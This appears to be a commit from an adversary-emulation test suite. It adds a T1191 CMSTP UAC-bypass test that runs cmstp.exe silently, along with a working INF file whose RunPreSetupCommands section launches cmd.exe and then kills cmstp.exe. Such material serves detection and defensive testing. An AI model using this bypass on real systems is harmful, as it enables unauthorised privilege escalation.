Add test for T1191 UAC Bypass

This commit is contained in:
Nik Seetharaman
2018-07-27 02:59:47 -05:00
parent 58fc9342e4
commit dbae21ab77
2 changed files with 51 additions and 0 deletions
+22
View File
@@ -19,3 +19,25 @@ atomic_tests:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_path}
- name: TODO
description: |
TODO
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: todo
default: TODO
executor:
name: command_prompt
command: |
TODO
+29
View File
@@ -0,0 +1,29 @@
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection
;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
;AddReg=Xnstall.AddReg.AllUsers
RegisterOCXs=RegisterOCXSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
c:\windows\system32\cmd.exe
taskkill /IM cmstp.exe /F
[Strings]
ServiceName="MalCorp"
ShortSvcName="malcorp"
DesktopGUID="{BC63D377-66BA-4935-BAD4-DD402D23A85A}"
UninstallAppTitle="MalCorp"
DesktopIcon=""
PhonebookPath=""
BeginPrompt="Do you want to remove MalCorp?"
EndPrompt="Successfully removed MalCorp."
DisplayLCID=1033
CmLCID=1033